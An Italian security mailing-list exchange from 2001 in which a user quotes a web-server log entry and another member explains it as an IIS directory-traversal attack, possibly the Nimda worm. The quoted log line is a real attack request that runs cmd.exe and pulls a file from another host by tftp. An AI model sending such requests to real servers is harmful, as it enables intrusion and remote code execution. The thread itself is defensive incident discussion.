Re: Un saluto e domandina

>Ciao a tutti, trovo ultimamente, sempre piu' spesso nei log, questa riga:
>
>oops_id	oops_url	oops_ip	oops_date	oops_durl
>902190	 	151.4.121.7	24/09/2001 14.45.00 
>#?404;http://www/scripts/..S5c../winnt/system32/cmd.exe?/c tftp -i 
>151.4.121.11 GET Admin.dll e:\Admin.dll
>
>che devo fare? il signor 151.4.121.7, esiste, è vero e posso torturarlo?
>grazie a chi mi da una rispostina
>
>Ciao
>Ste
Ciao
allora quella stringa permette di eseguire comandi su IIS e' un bug non 
ancora patchato a quanto ne so e sfrutta la codifica dei caratteri per 
effettuare il directory traversal e tramite cmd.exe, arrivare quindi a poter 
eseguire comandi sul server.
Tftp e' un clien ftp batch (da linea di comando) che di solito e' usato x 
uploadare file sul'IIS bucato.
Ora non ho la sintassi ma di solito viene usato un server tftp da cui 
prendere i file...ora non so bene come si propaga NIMDA ma penso potrebbe 
essere quel worm....altrimenti e' qualcuno che ci ha provato manualmente :) 
ciauzzz

_________________________________________________________________
Scarica GRATUITAMENTE MSN Explorer all'indirizzo 
http://explorer.msn.it/intl.asp


________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List